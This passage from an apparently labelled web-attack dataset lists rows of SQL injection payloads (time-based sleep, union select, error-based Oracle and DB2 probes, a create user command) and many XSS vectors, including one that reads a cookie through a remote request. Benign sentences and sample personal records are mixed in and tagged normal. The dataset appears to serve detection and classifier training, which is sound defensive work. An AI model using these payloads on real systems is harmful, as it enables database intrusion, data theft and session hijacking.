information_schema.character_sets group by x ) a ) ) +'",2,SQLi,19502 -1' ) as xrap where 5523 = 5523 rlike ( select * from ( select ( sleep ( 5 ) ) ) vwyq ) #,2,SQLi,17667 -1'+ ( select gqez where 3704 = 3704,2,SQLi,13346 -\xE2\x80\x85javascript:javascript:confirm(1),1,XSS,9510 -<menu onpointerup=alert(1)>XSS</menu>,1,XSS,4528 -1 where 4153 = 4153 and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) --,2,SQLi,15910 -Insert the memory stick.,0,normal,22850 -end if,2,SQLi,13099 -"1 ) ) ) and 8189 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,16369 -"{""id"":null,""firstName"":""Ong"",""lastName"":""Guang"",""address"":""93 NORTH 9TH STREET, BROOKLYN NY 11211"",""city"":""468"",""telephone"":""1008149464""}",0,normal,25379 -AND 1 = utl_inaddr.get_host_address ( ( SELECT host_name FROM v$instance ) ) AND 'i' = 'i,2,SQLi,11778 -%' AND 8310=8311 AND '%'=',2,SQLi,10376 -<mark onpointerleave=alert(1)>XSS</mark>,1,XSS,5177 -"-7084%' union all select 5727,5727,5727,5727,5727,5727,5727,5727,5727,5727--",2,SQLi,21709 -"<fieldset onbeforecut=""alert(1)"" contenteditable>test</fieldset>",1,XSS,6675 -"iif ( 2452 = 8999,1,1/0 )",2,SQLi,12705 -"1"" ) ) as rfgu where 4880 = 4880 union all select null,null,null,null,null,null,null,null,null--",2,SQLi,13585 -"1' ) ) ) and exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8190 = 8190,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ( ( ( 'lyem' like 'lyem",2,SQLi,14687 -"{""id"":null,""firstName"":""Rohaida"",""lastName"":""Ibrahim"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",0,normal,25518 -‘ or 3 = 3 --,2,SQLi,11664 -"<bdi onmouseenter=""alert(1)"">test</bdi>",1,XSS,5334 -1' ) ) and 2832 = 4165--,2,SQLi,15255 -<s id=x tabindex=1 ondeactivate=alert(1)></s><input id=y autofocus>,1,XSS,2641 -"1"" ) as upjw where 3880 = 3880 and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,16147 -"<colgroup draggable=""true"" ondragenter=""alert(1)"">test</colgroup>",1,XSS,2959 -"<style>@keyframes slidein {}</style><hr style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></hr>",1,XSS,4480 -<</script/script><script ~~~>\u0061lert(1)</script ~~~>,1,XSS,9771 -<datalist id=x tabindex=1 onbeforeactivate=alert(1)></datalist>,1,XSS,2630 -<script> document.getElementById(%22safe123%22).setCapture(); document.getElementById(%22safe123%22).click(); </script>,1,XSS,9254 -"<ins draggable=""true"" ondragend=""alert(1)"">test</ins>",1,XSS,2395 -"<div draggable=""true"" contenteditable>drag me</div><section ondrop=alert(1) contenteditable>drop here</section>",1,XSS,4126 -"<form onmouseenter=""alert(1)"">test</form>",1,XSS,2831 -"-7469 ) where 5875 = 5875 or make_set ( 9354 = 9354,7185 ) --",2,SQLi,14560 -"1"" where 2989 = 2989 or 8421 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,15551 -"<image oncontextmenu=""alert(1)"">test</image>",1,XSS,3498 -<article onpointerout=alert(1)>XSS</article>,1,XSS,8127 -"`-alert(1)"">'onload=""`<svg/1='",1,XSS,9359 -"<menuitem oncopy=""alert(1)"" contenteditable>test</menuitem>",1,XSS,2203 -"<style><img src=""</style><img src=x onerror=alert(XSS)//"">",1,XSS,916 -"select * from users where id = 1 +1 union select 1,banner from v$version where rownum = 1 -- 1",2,SQLi,11810 -Select quintuple-check.,0,normal,24754 -"1"" ) ) ) order by 1--",2,SQLi,19469 -"<a href=""javascript:javascript:alert(1)""><event-source src=""data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A"">",1,XSS,683 -"1"" ) where 7010 = 7010 and 9660 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,12380 -handler,2,SQLi,10219 -"1' where 8950 = 8950 or 1022 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,15484 -Select your agreement.,0,normal,25130 --3211 ) ) as fsej where 6348 = 6348 or 9805 = 3783--,2,SQLi,14586 -"<textarea draggable=""true"" ondragstart=""alert(1)"">test</textarea>",1,XSS,2731 -<datalist onpointerout=alert(1)>XSS</datalist>,1,XSS,2484 -1' ) and 6969 = ( select 6969 from pg_sleep ( 5 ) ) and ( 'ifvz' like 'ifvz,2,SQLi,17793 -"<small draggable=""true"" ondragend=""alert(1)"">test</small>",1,XSS,1969 --',2,SQLi,9935 -1' in boolean mode ) and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) #,2,SQLi,16183 -<thead id=x tabindex=1 onbeforedeactivate=alert(1)></thead><input autofocus>,1,XSS,8545 -"1"" ) ) and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 4241 = 4241 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( ""fkip"" = ""fkip",2,SQLi,20473 -"<style>@keyframes slidein {}</style><col style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></col>",1,XSS,5548 -"1"" ) ) and 7656 = 5604 and ( ( ""zuhv"" = ""zuhv",2,SQLi,20536 --6813 ) ) ) or 6872 = 6872 and ( ( ( 7304 = 7304,2,SQLi,16821 -1' ) ) as xqam where 6750 = 6750,2,SQLi,19955 -"-3282' ) union all select 9002,9002,9002,9002,9002#",2,SQLi,21051 -"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><ol id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></ol>",1,XSS,6405 -"1' ) ) as uuuk where 7234 = 7234 and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) --",2,SQLi,13748 -1' ) where 5378 = 5378,2,SQLi,14010 -"<sup onbeforepaste=""alert(1)"" contenteditable>test</sup>",1,XSS,3821 -"1' ) ) ) and 9254 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,14780 -Select goods.,0,normal,24737 -"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--",2,SQLi,10615 -1%' ) ) or sleep ( 5 ) #,2,SQLi,12830 -"<style>@keyframes slidein {}</style><iframe style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></iframe>",1,XSS,3380 -"1' ) and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ( 'xfmq' = 'xfmq",2,SQLi,20404 -"{""id"":null,""name"":""clearly pencil""}",0,normal,25267 -<big onfocusout=alert(1) tabindex=1 id=x></big><input autofocus>,1,XSS,7583 -<nav onpointermove=alert(1)>XSS</nav>,1,XSS,4820 -"<canvas onkeypress=""alert(1)"" contenteditable>test</canvas>",1,XSS,4013 -Insert the link.,0,normal,23060 -"-8312%"" ) ) union all select 4972--",2,SQLi,15212 -She'll select her shoes.,0,normal,24524 -"1 where 6369 = 6369 procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) --",2,SQLi,16594 -"<footer draggable=""true"" ondragleave=""alert(1)"">test</footer>",1,XSS,7102 -"select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 and ""%"" = """,2,SQLi,13289 -<style onpointerover=alert(1)>XSS</style>,1,XSS,2830 -<menuitem id=x tabindex=1 onfocusin=alert(1)></menuitem>,1,XSS,5208 -"select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) and ""%"" = """,2,SQLi,18583 -or ''-',2,SQLi,9940 -"<style>@keyframes x{}</style><mark style=""animation-name:x"" onanimationend=""alert(1)""></mark>",1,XSS,2217 -"<style>@keyframes x{}</style><rp style=""animation-name:x"" onanimationend=""alert(1)""></rp>",1,XSS,7890 -"<tbody draggable=""true"" ondragleave=""alert(1)"">test</tbody>",1,XSS,2062 -"<basefont onmousedown=""alert(1)"">test</basefont>",1,XSS,6849 -top[/al/.source+/ert/.source](1),1,XSS,4323 -"1' where 4150 = 4150 and elt ( 8012 = 6026,6026 ) --",2,SQLi,18860 -radians,0,normal,23403 -"<style>@keyframes x{}</style><div style=""animation-name:x"" onanimationend=""alert(1)""></div>",1,XSS,8479 -"<command onkeypress=""alert(1)"" contenteditable>test</command>",1,XSS,5717 -"<element onbeforecut=""alert(1)"" contenteditable>test</element>",1,XSS,4775 -"{""id"":null,""firstName"":""Jett"",""lastName"":""Salvador"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",0,normal,25502 -"<style>:target {color:red;}</style><object id=x style=""transition:color 1s"" ontransitionend=alert(1)></object>",1,XSS,7336 -"<script onpaste=""alert(1)"" contenteditable>test</script>",1,XSS,8242 --2174' ) ) as zhoz where 4185 = 4185 order by 1#,2,SQLi,14304 -1 or 6793 = ( select 6793 from pg_sleep ( 5 ) ) -- fyaq,2,SQLi,14700 -<rtc id=x tabindex=1 onfocusin=alert(1)></rtc>,1,XSS,6665 -1;SELECT%20*,2,SQLi,10224 -<listing id=x tabindex=1 onbeforeactivate=alert(1)></listing>,1,XSS,5648 -"<style>@keyframes slidein {}</style><datalist style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></datalist>",1,XSS,3184 --3899' ) where 8152 = 8152 or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 3440 = 3440 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) --,2,SQLi,12409 --6178 ) ) as lygb where 9559 = 9559 or ( 8459 = 8459 ) *4906--,2,SQLi,21093 -select ( case when ( 4624 = 4844 ) then 4624 else 1/ ( select 0 ) end ) --,2,SQLi,13215 -<span id=x tabindex=1 onbeforeactivate=alert(1)></span>,1,XSS,2075 -"1"" ) ) or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select ( elt ( 1297 = 1297,1 ) ) ) ,0x717a767a71 ) ) and ( ( ""ozvp"" = ""ozvp",2,SQLi,12633 -<bgsound onpointerenter=alert(1)>XSS</bgsound>,1,XSS,7614 -"1' ) and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 )",2,SQLi,16507 -Merge the customer records.,0,normal,22888 --1432 order by 1#,2,SQLi,15049 -"<bdi oncopy=""alert(1)"" contenteditable>test</bdi>",1,XSS,5212 -"{""id"":null,""firstName"":""Juay"",""lastName"":""Yew Hai"",""address"":""116 N JEFFERSON STREET, ROANOKE VA 24016"",""city"":""180"",""telephone"":""2860660834""}",0,normal,25284 -"<rt onbeforecut=""alert(1)"" contenteditable>test</rt>",1,XSS,3188 -"<command oncopy=""alert(1)"" contenteditable>test</command>",1,XSS,8461 -Sort the books.,0,normal,23025 -"<frame onbeforecopy=""alert(1)"" contenteditable>test</frame>",1,XSS,6756 -"-2745' or elt ( 1032 = 1032,3623 )",2,SQLi,20069 -"<picture><source srcset=""validimage.png""><image onloadstart=alert(1)></picture>",1,XSS,3609 -"-8636"" ) ) ) union all select 1821,1821,1821,1821,1821,1821,1821,1821,1821,1821--",2,SQLi,12562 -Modify the privacy controls.,0,normal,22939 -"<script src=""data:\xE0\xA4\x98,javascript:alert(1)""></script>",1,XSS,439 -"1%' ) ) ) and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,13460 -"<style>:target {color:red;}</style><samp id=x style=""transition:color 1s"" ontransitionend=alert(1)></samp>",1,XSS,8318 -Where did you find that serene retreat?,0,normal,24119 --9311 ) ) or ( 5065 = 2572 ) *2572 and ( ( 1199 = 1199,2,SQLi,15012 -"-9462"" ) as vzga where 4799 = 4799 or 8691 = 1048",2,SQLi,22379 -"select * from users where id = 1 or $<\ union select 1,@@VERSION -- 1",2,SQLi,11903 -"{""id"":null,""name"":""please ring""}",0,normal,25493 -"<style>:target {color: red;}</style><caption id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></caption>",1,XSS,6316 -or 1 in (select @@version)--,2,SQLi,10193 -<textarea onselect=alert(1) autofocus>XSS</textarea>,1,XSS,8058 -"1"" ) ) and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) and ( ( ""opgb"" like ""opgb",2,SQLi,15042 -"<ins draggable=""true"" ondrag=""alert(1)"">test</ins>",1,XSS,3666 -"<datalist onkeyup=""alert(1)"" contenteditable>test</datalist>",1,XSS,7748 -"AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=6)) AND 'i'='i",2,SQLi,11155 -1 and sleep ( 5 ) #,2,SQLi,21331 -"-2840' ) ) ) union all select 3025,3025,3025,3025--",2,SQLi,17388 -"{""id"":null,""firstName"":""Adrian"",""lastName"":""Khong"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",0,normal,25349 -1' ) ) or ( select * from ( select ( sleep ( 5 ) ) ) sddo ) #,2,SQLi,16426 -1'|| ( select 'irfn' where 8360 = 8360,2,SQLi,21485 -"<object data=%22data:text/html;base64,PHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub3BlbignR0VUJywgJ2h0dHA6Ly94c3NtZS5odG1sNXNlYy5vcmcveHNzbWUyJywgdHJ1ZSk7IHhoci5vbmxvYWQgPSBmdW5jdGlvbigpIHsgYWxlcnQoeGhyLnJlc3BvbnNlVGV4dC5tYXRjaCgvY29va2llID0gJyguKj8pJy8pWzFdKSB9OyB4aHIuc2VuZCgpOyA8L3NjcmlwdD4=%22>",1,XSS,9225 -""") waitfor delay '0:0:20' --",2,SQLi,10983 -"-6770"" or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 3440 = 3440 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric )",2,SQLi,17240 -"<div draggable=""true"" contenteditable>drag me</div><marquee ondragover=alert(1) contenteditable>drop here</marquee>",1,XSS,5228 -"{""id"":null,""name"":""leg""}",0,normal,25240 -"{""id"":null,""firstName"":""Jessie"",""lastName"":""Ting"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",0,normal,25734 -"{""id"":null,""name"":""smooth""}",0,normal,25492 -"<multicol onmouseout=""alert(1)"">test</multicol>",1,XSS,3978 -Select a location.,0,normal,25005 -"1 ) ) ) or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ( ( ( 2230 = 2230",2,SQLi,13305 -"<script>var request = new XMLHttpRequest();request.open('GET', 'http://html5sec.org/xssme2', false);request.send(null);if (request.status == 200){alert(request.responseText.substr(150,41));}</script>",1,XSS,9280 -"1"" ) ) as xxdm where 4818 = 4818",2,SQLi,13062 -select * from users where id = 1.<@. or 1 = 1 -- 1,2,SQLi,11609 -"{""id"":null,""name"":""society""}",0,normal,25807 -"1"" ) ) or ( select * from ( select ( sleep ( 5 ) ) ) ydpu ) and ( ( ""knbx"" = ""knbx",2,SQLi,17978 -"-5779 ) union all select 6089,6089--",2,SQLi,20206 -Select your mark.,0,normal,25078 -"{""id"":null,""firstName"":""Lhq"",""lastName"":""Totheq"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",0,normal,25606 -"1' ) ) union all select null,null,null,null,null,null,null,null--",2,SQLi,18776 -select * from users where id = 1 +$ 1 or 1 = 1 -- 1,2,SQLi,11544 -"`'><script>\x0Cjavascript:alert(515)</script> -`'><script>\x0Djavascript:alert(1)</script>",1,XSS,8935 -"<area draggable=""true"" ondrag=""alert(1)"">test</area>",1,XSS,2699 -Select your government.,0,normal,25052 -1'+ ( select kfmv where 1679 = 1679,2,SQLi,14050 -"<nav draggable=""true"" ondragenter=""alert(1)"">test</nav>",1,XSS,5567 -Let's decide where to go for a weekend adventure.,0,normal,23865 -"{""id"":null,""firstName"":""Miki"",""lastName"":""Jiang"",""address"":""1800 OLD TROY RD, UNION CITY TN 38261"",""city"":""285"",""telephone"":""4703923619""}",0,normal,25958 -"<rb onpaste=""alert(1)"" contenteditable>test</rb>",1,XSS,6495 -"1"" ) ) procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75 ) ) ) ) ) ,1 ) #",2,SQLi,21664 -<object onpointerenter=alert(1)>XSS</object>,1,XSS,5536 -"<noembed onkeyup=""alert(1)"" contenteditable>test</noembed>",1,XSS,1797 -"1 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )",2,SQLi,14197 -"<style>:target {color: red;}</style><html id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></html>",1,XSS,7342 -"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><object id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></object>",1,XSS,5147 -"1 ) ) ) union all select null,null--",2,SQLi,21589 -ORDER BY 5--,2,SQLi,10282 -<multicol onpointerenter=alert(1)>XSS</multicol>,1,XSS,6587 -if ( 7340 = 9813 ) select 7340 else drop function yppp--,2,SQLi,20002 -"1 ) ) as vycb where 3524 = 3524 and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,21857 -Select the appropriate size for the shoes.,0,normal,24269 -<svg><discard onbegin=alert(1)>,1,XSS,225 -"-9178 where 2253 = 2253 union all select 2253,2253,2253,2253,2253,2253,2253,2253#",2,SQLi,20213 -"1' and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 6055 = 6055 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and 'moyb' = 'moyb",2,SQLi,15199 -"<style>@keyframes x{}</style><code style=""animation-name:x"" onanimationend=""alert(1)""></code>",1,XSS,4398 -<meter onpointerout=alert(1)>XSS</meter>,1,XSS,6988 -<i onfocusout=alert(1) tabindex=1 id=x></i><input autofocus>,1,XSS,8859 -&#0000060,1,XSS,1024 -<video id=x tabindex=1 onbeforeactivate=alert(1)></video>,1,XSS,1992 -create user name identified by 'pass123',2,SQLi,11196 -"<![><img src=""]><img src=x onerror=alert(XSS)//"">",1,XSS,915 -"`'><script>\xE2\x8523\x9Fjavascript:alert(523)</script> -`'><script>\xE3\x80\x80javascript:alert(1)</script>",1,XSS,8958 -"select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and ( ( ( ""mubt"" = ""mubt",2,SQLi,14449 -Choose fields where needed.,0,normal,23441 -"or username like char ( 37 ) ,",2,SQLi,11585 -They'll update the software.,0,normal,23197 -I need to select the right music for the party.,0,normal,24012 -"1%"" ) ) ) and exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8190 = 8190,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ( ( ( ""%"" = """,2,SQLi,16057 -"-6075' union all select 9988,9988,9988,9988,9988,9988,9988,9988,9988#",2,SQLi,21582 -"1' and 9660 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,17665 -1' ) ) as vwua where 8099 = 8099 union all select null--,2,SQLi,12912 -"1' ) or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )",2,SQLi,16486 -Select a book.,0,normal,24984 -<br id=x tabindex=1 onfocus=alert(1)></br>,1,XSS,5263 --4681 or 4747 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4747 = 4747 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) # rltx,2,SQLi,19854 -Where's the townhouse?,0,normal,23743 -"1' ) union all select null,null,null,null,null,null--",2,SQLi,14462 -"{""id"":null,""name"":""Australian Mist""}",0,normal,26102 -"<img usemap=#x><map name=""x""><area href onfocusin=alert(1) id=x>",1,XSS,5737 -<iframe src=%(scriptlet)s <,1,XSS,701 -1'+ ( select 'mdiu' where 4443 = 4443,2,SQLi,16039 -1'+ ( select iutk where 6158 = 6158,2,SQLi,13072 -"<optgroup oncut=""alert(1)"" contenteditable>test</optgroup>",1,XSS,5663 -"<;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>;",1,XSS,1580 -"<figure onbeforepaste=""alert(1)"" contenteditable>test</figure>",1,XSS,3074 -1'+ ( select 'fqkk' where 9725 = 9725,2,SQLi,16248 -"select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) and 'gfpd' = 'gfpd",2,SQLi,13011 -"<style>@keyframes x{}</style><input style=""animation-name:x"" onanimationend=""alert(1)""></input>",1,XSS,3967 -<address id=x tabindex=1 onbeforedeactivate=alert(1)></address><input autofocus>,1,XSS,4935 -"<body BACKGROUND=""javascript:document.vulnerable=true;"">",1,XSS,1433 -a' --,2,SQLi,11100 -"1%' ) ) and make_set ( 6527 = 9529,9529 ) and ( ( '%' = '",2,SQLi,16684 -<marquee loop=1 width=0 onfinish=alert(1)>//INJECTX,1,XSS,9910 -"<menuitem onmousedown=""alert(1)"">test</menuitem>",1,XSS,5246 -&lt;IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29&gt;,1,XSS,1053 -"<p oncopy=""alert(1)"" contenteditable>test</p>",1,XSS,5051 -"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--",2,SQLi,11040 -Where's the massage parlor?,0,normal,23801 -") AND ELT(1337=1337,SLEEP(5)) AND (1337=1337",2,SQLi,11323 -"1%"" and sleep ( 5 ) #",2,SQLi,22097 -<td onpointerup=alert(1)>XSS</td>,1,XSS,5140 -"<span oncut=""alert(1)"" contenteditable>test</span>",1,XSS,5200 -<hr onpointerup=alert(1)>XSS</hr>,1,XSS,2711 -"1"" ) as eaxo where 2728 = 2728",2,SQLi,19447 -"<meter draggable=""true"" ondragleave=""alert(1)"">test</meter>",1,XSS,4694 -"<object classid=""clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B"" onqt_error=""alert(126)"" style=""behavior:url(#x);""><param name=postdomevents /></object>//[""'`-->]]>]</div>",1,XSS,9223 -1 and sleep 5--,2,SQLi,11225 -"1 where 8114 = 8114 and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,15140 -"or sleep(__TIME__)# -pg_sleep(__TIME__)-- -*(|(objectclass=*)) -declare @q nvarchar (200) 0x730065006c00650063 ... -or 0=0 # -insert -1) or sleep(__TIME__)# -) or ('a'='a -; exec xp_regread -*| -@var select @var as var into temp end -- -1)) or benchmark(10000000,MD5(1))# -asc -(||6) -a"""" or 3=3--""",2,SQLi,10115 -Delete files.,0,normal,23205 -"1 ) ) and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) and ( ( 5507 = 5507",2,SQLi,19609 -"<body onPopState body onPopState=""javascript:javascript:alert(1)""></body onPopState>",1,XSS,388 -"{""id"":null,""name"":""Alligator""}",0,normal,25542 -"<source onmouseout=""alert(1)"">test</source>",1,XSS,4654 -1 ) as vqdh where 1603 = 1603,2,SQLi,15950 -"1'|| ( select 'ymez' from dual where 9870 = 9870 or 7417 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,12940 -"<meta http-equiv=""Content-Type"" content=""text/html; charset=UTF-7"" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-",1,XSS,178 -"1' ) and elt ( 1407 = 6365,6365 ) and ( 'zckl' = 'zckl",2,SQLi,17717 -<td onpointerdown=alert(1)>XSS</td>,1,XSS,2763 -1 or sleep ( __TIME__ ) #,2,SQLi,11819 -1 where 4785 = 4785 and 7756 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 7756 = 7756 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) --,2,SQLi,16480 -1' ) rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) and ( 'zqiw' = 'zqiw,2,SQLi,14796 -<ul id=x tabindex=1 onactivate=alert(1)></ul>,1,XSS,3959 -1' ) ) as nsfx where 9553 = 9553 rlike sleep ( 5 ) --,2,SQLi,19444 -"-5516'+ ( select 'bmlv' where 7188 = 7188 union all select 7188,7188,7188,7188,7188,7188,7188,7188#",2,SQLi,22214 -"1' or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a )",2,SQLi,19096 -"1 ) as lejp where 5238 = 5238 union all select null,null,null,null,null#",2,SQLi,21445 -Order a classic burger.,0,normal,22840 -"<details onmouseleave=""alert(1)"">test</details>",1,XSS,6754 -"1' ) ) ) or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,15915 -ORDER BY 11#,2,SQLi,10319 -select pg_sleep ( 5 ) and ( ( 4382 = 4382,2,SQLi,15614 -"1',extractvalue ( 9788,concat ( 0x5c,0x7171706a71, ( select ( elt ( 9788 = 9788,1 ) ) ) ,0x717a767a71 ) )",2,SQLi,12792 -"<sup onmouseover=""alert(1)"">test</sup>",1,XSS,4014 -"<div draggable=""true"" contenteditable>drag me</div><address ondragover=alert(1) contenteditable>drop here</address>",1,XSS,5509 -"<element onmouseup=""alert(1)"">test</element>",1,XSS,5785 -"<style>@keyframes x{}</style><caption style=""animation-name:x"" onanimationstart=""alert(1)""></caption>",1,XSS,3614 -"<style>:target {transform: rotate(180deg);}</style><multicol id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></multicol>",1,XSS,7031 -expression(alert('')),1,XSS,8443 -"{""id"":null,""firstName"":""Eve"",""lastName"":""Ang"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",0,normal,25653 -Select your imagine.,0,normal,25159 -"<img src=""javascript:alert(1)"">",1,XSS,218 -"<IMG SRC=x onplay=""alert(String.fromCharCode(88,83,83))"">",1,XSS,1183 -Select appetizer.,0,normal,24680 -Where's the campground?,0,normal,23734 -"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#",2,SQLi,10674 --8074' ) or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4493 = 4493 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ( 'lnwm' = 'lnwm,2,SQLi,14857 -"<caption oncut=""alert(1)"" contenteditable>test</caption>",1,XSS,7088 -"end and ""xouo"" like ""xouo",2,SQLi,12976 -"call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( 'ckpm' = 'ckpm",2,SQLi,19087 -"<marquee onbeforecopy=""alert(1)"" contenteditable>test</marquee>",1,XSS,5626 -"<template draggable=""true"" ondrag=""alert(1)"">test</template>",1,XSS,3170 